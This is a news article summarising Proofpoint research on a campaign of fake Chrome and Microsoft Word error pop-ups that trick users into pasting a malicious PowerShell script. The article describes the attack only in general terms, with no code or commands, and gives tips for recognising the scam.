Yet another cybersecurity issue has been discovered, this time for Google Chrome and Microsoft users. Proofpoint, an online security firm has flagged an ongoing campaign that mimics official pop-up windows and instructs the user with a script. By following these instructions, it has the potential to steal money. Proofpoint researchers identified an increasingly popular technique that leverages unique social engineering to run PowerShell and install malware.

The company says it has “observed an increase in a technique that leverages unique social engineering tactics that instruct users to copy and paste a malicious PowerShell script in order to infect their computer with malware.”

What is this stealing malware?

Whether the initial campaign starts via malspam or is delivered via web browser injection, the technique is the same, experts warned. Users are shown a pop-up textbox stating that an error has occurred while attempting to open a document or webpage, and given instructions to copy and paste the malicious script into a PowerShell terminal, or into a Windows Run dialog box to ultimately run the script via PowerShell.

Research also shows that cybercriminals are exploiting this technique and using it to deliver a variety of malware. Apart from Google Chrome, it can also come in the form of email lures. The emails, which usually appear to be work or corporate-related, will contain a Hypertext Markup Language file that resembles Microsoft Word and contain a variety of error messages.

Similarly, users were prompted to open PowerShell and copy malicious code, in a deceptive “campaign” that, according to Proofpoint, was widespread. Experts have observed this technique in early March 2024 by TA571, and in early April by the Clearfake cluster, as well as both clusters in early June.

How to avoid this stealing malware?

Although it sounds extreme, it is easy to spot. To avoid this scam, the biggest feature of the scam is that you will see a popup text that tells you that an error has occurred while trying to open a document or webpage. The popup contains instructions to copy and paste the text into the PowerShell terminal or Windows Run dialog box.

On the surface, one might assume that this would be easy to identify and ignore as unusual. But Proofpoint warns that “although the attack chain requires significant user interaction to succeed, social engineering can so cleverly present someone with both the real problem and the solution simultaneously that it can lead the user to take action without considering the risk.”

The focus of most of the malware installed appears to be credential theft, as well as activating fraudulent crypto transactions, wherein the user has used the device to transfer their own crypto.

Experts warn that this attack chain requires significant user interaction to succeed. The social engineering in fake error messages is clever and claims to be an official notification coming from the operating system. It provides both the problem and the solution so that a viewer can take immediate action without considering the risk.